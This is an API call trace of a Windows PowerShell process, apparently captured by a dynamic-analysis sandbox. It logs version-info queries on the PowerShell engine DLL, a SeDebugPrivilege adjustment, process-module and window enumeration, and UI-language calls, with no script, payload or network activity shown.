	[0087.584] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0087.584] CoTaskMemAlloc (cb=0x20) returned 0x274170
	[0087.584] lstrcpyW (in: lpString1=0x274170, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0087.584] CoTaskMemFree (pv=0x274170) 
	[0087.584] VerQueryValueW (in: pBlock=0x2d17370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x13dd38, puLen=0x13dd30 | out: lplpBuffer=0x13dd38*=0x2d175d8, puLen=0x13dd30) returned 1
	[0087.584] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0087.584] CoTaskMemAlloc (cb=0x44) returned 0x20dc70
	[0087.584] lstrcpyW (in: lpString1=0x20dc70, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0087.584] CoTaskMemFree (pv=0x20dc70) 
	[0087.584] VerQueryValueW (in: pBlock=0x2d17370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x13dd38, puLen=0x13dd30 | out: lplpBuffer=0x13dd38*=0x2d17640, puLen=0x13dd30) returned 1
	[0087.584] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0087.584] CoTaskMemAlloc (cb=0x76) returned 0x1fdf00
	[0087.584] lstrcpyW (in: lpString1=0x1fdf00, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0087.584] CoTaskMemFree (pv=0x1fdf00) 
	[0087.584] VerQueryValueW (in: pBlock=0x2d17370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x13dd38, puLen=0x13dd30 | out: lplpBuffer=0x13dd38*=0x2d176dc, puLen=0x13dd30) returned 1
	[0087.584] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0087.584] CoTaskMemAlloc (cb=0x44) returned 0x20dc70
	[0087.584] lstrcpyW (in: lpString1=0x20dc70, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0087.584] CoTaskMemFree (pv=0x20dc70) 
	[0087.584] VerQueryValueW (in: pBlock=0x2d17370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x13dd38, puLen=0x13dd30 | out: lplpBuffer=0x13dd38*=0x2d17740, puLen=0x13dd30) returned 1
	[0087.584] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0087.585] CoTaskMemAlloc (cb=0x58) returned 0x1b4d30
	[0087.585] lstrcpyW (in: lpString1=0x1b4d30, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0087.585] CoTaskMemFree (pv=0x1b4d30) 
	[0087.585] VerQueryValueW (in: pBlock=0x2d17370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x13dd38, puLen=0x13dd30 | out: lplpBuffer=0x13dd38*=0x2d177bc, puLen=0x13dd30) returned 1
	[0087.585] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0087.585] CoTaskMemAlloc (cb=0x20) returned 0x274170
	[0087.585] lstrcpyW (in: lpString1=0x274170, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0087.585] CoTaskMemFree (pv=0x274170) 
	[0087.585] VerQueryValueW (in: pBlock=0x2d17370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x13dd38, puLen=0x13dd30 | out: lplpBuffer=0x13dd38*=0x2d17464, puLen=0x13dd30) returned 1
	[0087.585] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0087.585] CoTaskMemAlloc (cb=0x66) returned 0x27c040
	[0087.585] lstrcpyW (in: lpString1=0x27c040, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0087.585] CoTaskMemFree (pv=0x27c040) 
	[0087.585] VerQueryValueW (in: pBlock=0x2d17370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x13dd38, puLen=0x13dd30 | out: lplpBuffer=0x13dd38*=0x0, puLen=0x13dd30) returned 0
	[0087.585] VerQueryValueW (in: pBlock=0x2d17370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x13dd38, puLen=0x13dd30 | out: lplpBuffer=0x13dd38*=0x0, puLen=0x13dd30) returned 0
	[0087.585] VerQueryValueW (in: pBlock=0x2d17370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x13dd38, puLen=0x13dd30 | out: lplpBuffer=0x13dd38*=0x0, puLen=0x13dd30) returned 0
	[0087.585] VerQueryValueW (in: pBlock=0x2d17370, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x13dd08, puLen=0x13dd00 | out: lplpBuffer=0x13dd08*=0x2d1740c, puLen=0x13dd00) returned 1
	[0087.586] CoTaskMemAlloc (cb=0x204) returned 0x1f8bd0
	[0087.586] VerLanguageNameW (in: wLang=0x0, szLang=0x1f8bd0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0087.587] CoTaskMemFree (pv=0x1f8bd0) 
	[0087.587] VerQueryValueW (in: pBlock=0x2d17370, lpSubBlock="\\", lplpBuffer=0x13dd58, puLen=0x13dd50 | out: lplpBuffer=0x13dd58*=0x2d17398, puLen=0x13dd50) returned 1
	[0087.645] GetCurrentProcessId () returned 0xafc
	[0087.656] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x13cc80 | out: lpLuid=0x13cc80*(LowPart=0x14, HighPart=0)) returned 1
	[0087.658] GetCurrentProcess () returned 0xffffffffffffffff
	[0087.659] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x13cca0 | out: TokenHandle=0x13cca0*=0x2f0) returned 1
	[0087.660] AdjustTokenPrivileges (in: TokenHandle=0x2f0, DisableAllPrivileges=0, NewState=0x2d1abe8*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0087.662] CloseHandle (hObject=0x2f0) returned 1
	[0087.666] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xafc) returned 0x2f0
	[0087.675] EnumProcessModules (in: hProcess=0x2f0, lphModule=0x2d1ac50, cb=0x200, lpcbNeeded=0x13dcb8 | out: lphModule=0x2d1ac50, lpcbNeeded=0x13dcb8) returned 1
	[0087.677] GetModuleInformation (in: hProcess=0x2f0, hModule=0x13ff20000, lpmodinfo=0x2d1aec0, cb=0x18 | out: lpmodinfo=0x2d1aec0*(lpBaseOfDll=0x13ff20000, SizeOfImage=0x77000, EntryPoint=0x13ff2c63c)) returned 1
	[0087.678] CoTaskMemAlloc (cb=0x804) returned 0x27d8a0
	[0087.678] GetModuleBaseNameW (in: hProcess=0x2f0, hModule=0x13ff20000, lpBaseName=0x27d8a0, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0087.678] CoTaskMemFree (pv=0x27d8a0) 
	[0087.679] CoTaskMemAlloc (cb=0x804) returned 0x27d8a0
	[0087.679] GetModuleFileNameExW (in: hProcess=0x2f0, hModule=0x13ff20000, lpFilename=0x27d8a0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0087.679] CoTaskMemFree (pv=0x27d8a0) 
	[0087.844] CloseHandle (hObject=0x2f0) returned 1
	[0087.852] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xafc) returned 0x2f0
	[0087.853] GetExitCodeProcess (in: hProcess=0x2f0, lpExitCode=0x13dde8 | out: lpExitCode=0x13dde8*=0x103) returned 1
	[0087.862] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12d1b088, Length=0x20000, ResultLength=0x13ddb0 | out: SystemInformation=0x12d1b088, ResultLength=0x13ddb0*=0x11450) returned 0x0
	[0088.060] EnumWindows (lpEnumFunc=0x2bb66ac, lParam=0x0) returned 1
	[0088.061] GetWindowThreadProcessId (in: hWnd=0x50212, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x4a0
	[0088.061] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x4a0
	[0088.061] GetWindowThreadProcessId (in: hWnd=0x400c4, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x4a0
	[0088.061] GetWindowThreadProcessId (in: hWnd=0x1013a, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x334
	[0088.061] GetWindowThreadProcessId (in: hWnd=0x10132, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x324
	[0088.062] GetWindowThreadProcessId (in: hWnd=0x10076, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x4a0
	[0088.062] GetWindowThreadProcessId (in: hWnd=0x10074, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x4a0
	[0088.062] GetWindowThreadProcessId (in: hWnd=0x10060, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x4a0
	[0088.062] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x4a0
	[0088.062] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x4a0
	[0088.062] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x4a0
	[0088.062] GetWindowThreadProcessId (in: hWnd=0x10078, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x4a0
	[0088.062] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x4a0
	[0088.062] GetWindowThreadProcessId (in: hWnd=0x10050, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x4a0
	[0088.062] GetWindowThreadProcessId (in: hWnd=0x100f6, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x45c
	[0088.062] GetWindowThreadProcessId (in: hWnd=0x5009a, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x4a0
	[0088.062] GetWindowThreadProcessId (in: hWnd=0x1008c, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x4a0
	[0088.063] GetWindowThreadProcessId (in: hWnd=0x101be, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x914
	[0088.063] GetWindowThreadProcessId (in: hWnd=0x3023a, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x40c
	[0088.063] GetWindowThreadProcessId (in: hWnd=0x60230, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0xbdc
	[0088.063] GetWindowThreadProcessId (in: hWnd=0x30234, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x8f0
	[0088.063] GetWindowThreadProcessId (in: hWnd=0x800aa, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0xb8c
	[0088.063] GetWindowThreadProcessId (in: hWnd=0x50228, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x5e0
	[0088.063] GetWindowThreadProcessId (in: hWnd=0x5021c, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x90
	[0088.064] GetWindowThreadProcessId (in: hWnd=0xa00a4, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x4a0
	[0088.064] GetWindowThreadProcessId (in: hWnd=0x400d6, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x4a0
	[0088.064] GetWindowThreadProcessId (in: hWnd=0x400fa, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x4a0
	[0088.064] GetWindowThreadProcessId (in: hWnd=0x500d2, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x4a0
	[0088.064] GetWindowThreadProcessId (in: hWnd=0x400bc, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x4a0
	[0088.064] GetWindowThreadProcessId (in: hWnd=0x400c8, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x4a0
	[0088.064] GetWindowThreadProcessId (in: hWnd=0x500d8, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x4a0
	[0088.064] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x4a0
	[0088.064] GetWindowThreadProcessId (in: hWnd=0x4021a, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x840
	[0088.064] GetWindowThreadProcessId (in: hWnd=0x3021e, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x844
	[0088.064] GetWindowThreadProcessId (in: hWnd=0x401f6, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x46c
	[0088.064] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0xb40
	[0088.065] GetWindowThreadProcessId (in: hWnd=0x40116, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x914
	[0088.065] GetWindowThreadProcessId (in: hWnd=0x700d4, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x988
	[0088.065] GetWindowThreadProcessId (in: hWnd=0x101ee, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x914
	[0088.065] GetWindowThreadProcessId (in: hWnd=0x201b8, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x950
	[0088.065] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x914
	[0088.065] GetWindowThreadProcessId (in: hWnd=0x201a8, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x914
	[0088.065] GetWindowThreadProcessId (in: hWnd=0x201aa, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x868
	[0088.065] GetWindowThreadProcessId (in: hWnd=0x101ae, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x850
	[0088.065] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x830
	[0088.065] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x814
	[0088.065] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x744
	[0088.066] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x2a8
	[0088.066] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x534
	[0088.066] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x5e4
	[0088.066] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x5c4
	[0088.066] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x58c
	[0088.066] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x238
	[0088.066] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x584
	[0088.066] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x7e8
	[0088.066] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x678
	[0088.066] GetWindowThreadProcessId (in: hWnd=0x10166, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x35c
	[0088.066] GetWindowThreadProcessId (in: hWnd=0x10162, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x51c
	[0088.066] GetWindowThreadProcessId (in: hWnd=0x1015e, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x360
	[0088.067] GetWindowThreadProcessId (in: hWnd=0x1015a, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x274
	[0088.067] GetWindowThreadProcessId (in: hWnd=0x20154, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x588
	[0088.067] GetWindowThreadProcessId (in: hWnd=0x20152, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0xc8
	[0088.067] GetWindowThreadProcessId (in: hWnd=0xa010a, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x21c
	[0088.067] GetWindowThreadProcessId (in: hWnd=0x3014e, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x5ec
	[0088.067] GetWindowThreadProcessId (in: hWnd=0x10144, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x334
	[0088.067] GetWindowThreadProcessId (in: hWnd=0x10142, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x664
	[0088.067] GetWindowThreadProcessId (in: hWnd=0x20138, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x334
	[0088.067] GetWindowThreadProcessId (in: hWnd=0x1012c, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x664
	[0088.067] GetWindowThreadProcessId (in: hWnd=0x10124, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x334
	[0088.067] GetWindowThreadProcessId (in: hWnd=0x1011a, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x5ec
	[0088.067] GetWindowThreadProcessId (in: hWnd=0x10118, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x5ec
	[0088.068] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x550
	[0088.068] GetWindowThreadProcessId (in: hWnd=0x2001c, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x7a0
	[0088.068] GetWindowThreadProcessId (in: hWnd=0x6009c, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x594
	[0088.068] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x564
	[0088.068] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x45c
	[0088.068] GetWindowThreadProcessId (in: hWnd=0x100fe, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x548
	[0088.068] GetWindowThreadProcessId (in: hWnd=0x5008e, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x4a0
	[0088.068] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x518
	[0088.068] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x4a0
	[0088.068] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x4a0
	[0088.068] GetWindowThreadProcessId (in: hWnd=0x10068, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x4a0
	[0088.068] GetWindowThreadProcessId (in: hWnd=0x10110, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x508
	[0088.069] GetWindowThreadProcessId (in: hWnd=0x10064, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x4a0
	[0088.069] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x4ec
	[0088.069] GetWindowThreadProcessId (in: hWnd=0x1004c, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x4a0
	[0088.069] GetWindowThreadProcessId (in: hWnd=0x10044, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x45c
	[0088.069] GetWindowThreadProcessId (in: hWnd=0x20040, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x45c
	[0088.069] GetWindowThreadProcessId (in: hWnd=0x3003e, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x44c
	[0088.069] GetWindowThreadProcessId (in: hWnd=0x20022, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x7ec
	[0088.069] GetWindowThreadProcessId (in: hWnd=0x100ee, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x45c
	[0088.069] GetWindowThreadProcessId (in: hWnd=0x10134, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x324
	[0088.069] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x4a0
	[0088.069] GetWindowThreadProcessId (in: hWnd=0x1004e, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x4a0
	[0088.069] GetWindowThreadProcessId (in: hWnd=0x101e0, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x914
	[0088.070] GetWindowThreadProcessId (in: hWnd=0x2019e, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x914
	[0088.070] GetWindowThreadProcessId (in: hWnd=0x50232, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x40c
	[0088.070] GetWindowThreadProcessId (in: hWnd=0x30236, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0xb0
	[0088.070] GetWindowThreadProcessId (in: hWnd=0xb0190, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x804
	[0088.070] GetWindowThreadProcessId (in: hWnd=0x800ce, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0xbc8
	[0088.070] GetWindowThreadProcessId (in: hWnd=0x701f2, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x854
	[0088.070] GetWindowThreadProcessId (in: hWnd=0x501f4, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x140
	[0088.070] GetWindowThreadProcessId (in: hWnd=0x30218, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x55c
	[0088.070] GetWindowThreadProcessId (in: hWnd=0x30222, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x34c
	[0088.070] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0xb40
	[0088.070] GetWindowThreadProcessId (in: hWnd=0x201f8, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x988
	[0088.070] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x868
	[0088.071] GetWindowThreadProcessId (in: hWnd=0x201ac, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x850
	[0088.071] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x830
	[0088.071] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x814
	[0088.071] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x744
	[0088.071] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x2a8
	[0088.071] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x534
	[0088.071] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x5e4
	[0088.071] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x5c4
	[0088.071] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x58c
	[0088.071] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x238
	[0088.071] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x584
	[0088.072] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x7e8
	[0088.072] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x678
	[0088.072] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x35c
	[0088.072] GetWindowThreadProcessId (in: hWnd=0x10164, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x51c
	[0088.072] GetWindowThreadProcessId (in: hWnd=0x10160, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x360
	[0088.072] GetWindowThreadProcessId (in: hWnd=0x1015c, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x274
	[0088.072] GetWindowThreadProcessId (in: hWnd=0x10158, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x588
	[0088.072] GetWindowThreadProcessId (in: hWnd=0x80150, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0xc8
	[0088.072] GetWindowThreadProcessId (in: hWnd=0x400a0, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x21c
	[0088.072] GetWindowThreadProcessId (in: hWnd=0x1012e, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x664
	[0088.072] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x334
	[0088.072] GetWindowThreadProcessId (in: hWnd=0x1011c, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x5ec
	[0088.073] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x550
	[0088.073] GetWindowThreadProcessId (in: hWnd=0x20016, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x7a0
	[0088.073] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x594
	[0088.073] GetWindowThreadProcessId (in: hWnd=0x10106, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x45c
	[0088.073] GetWindowThreadProcessId (in: hWnd=0x10112, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x508
	[0088.073] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x4ec
	[0088.073] GetWindowThreadProcessId (in: hWnd=0x10042, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x45c
	[0088.073] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x13db10 | out: lpdwProcessId=0x13db10) returned 0x7ec
	[0088.077] WerSetFlags () returned 0x0
	[0088.084] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0088.084] CoTaskMemFree (pv=0x0) 
	[0088.085] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x13de78, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x13de70 | out: pulNumLanguages=0x13de78, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x13de70) returned 1
	[0088.085] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x13de78, pwszLanguagesBuffer=0x2d41cf8, pcchLanguagesBuffer=0x13de70 | out: pulNumLanguages=0x13de78, pwszLanguagesBuffer=0x2d41cf8, pcchLanguagesBuffer=0x13de70) returned 1
